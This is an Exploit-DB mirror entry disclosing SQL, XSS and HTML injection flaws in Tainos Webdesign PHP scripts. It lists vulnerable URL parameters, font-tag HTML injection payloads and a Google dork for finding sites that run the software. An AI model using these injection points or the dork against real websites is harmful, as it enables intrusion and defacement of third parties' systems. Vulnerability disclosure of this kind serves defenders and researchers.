exploit-db-mirror/platforms/php/webapps/12631.txt
Offensive Security cc553d1147 DB: 2015-04-20
11 new exploits
2015-04-20 12:44:13 +00:00

36 lines
No EOL
1.4 KiB
Text
Executable file

-------------------------------------------------------------------------------------------
Tainos Webdesign (All Scripts) SQL/XSS/HTML Injection Vulnerability
-------------------------------------------------------------------------------------------
Author: CoBRa_21
Mail: uyku_cu@windowslive.com
Script Home: http://www.tainos-webdesign.com
Dork: intext:"© Tainos Webdesign"
-------------------------------------------------------------------------------------------
Sql Injection:
http://localhost/[path]/propertylux.php?ID=1 (SQL)
http://localhost/[path]/property.php?ID=199 (SQL)
-------------------------------------------------------------------------------------------
XSS Injection:
http://localhost/[path]/class.php?Class=Rental&Subclass=
http://localhost/[path]/class.php?Class=Sales&Subclass=
http://localhost/[path]/classlux.php?Class=Luxury&Subclass=
-------------------------------------------------------------------------------------------
HTML Injection:
http://localhost/[path]/class.php?Class=Rental&Subclass=<font color=red size=15>CoBRa_21</font>
http://localhost/[path]/class.php?Class=Sales&Subclass=<font color=red size=15>CoBRa_21</font>
http://localhost/[path]/classlux.php?Class=Luxury&Subclass=<font color=red size=15>CoBRa_21</font>
-------------------------------------------------------------------------------------------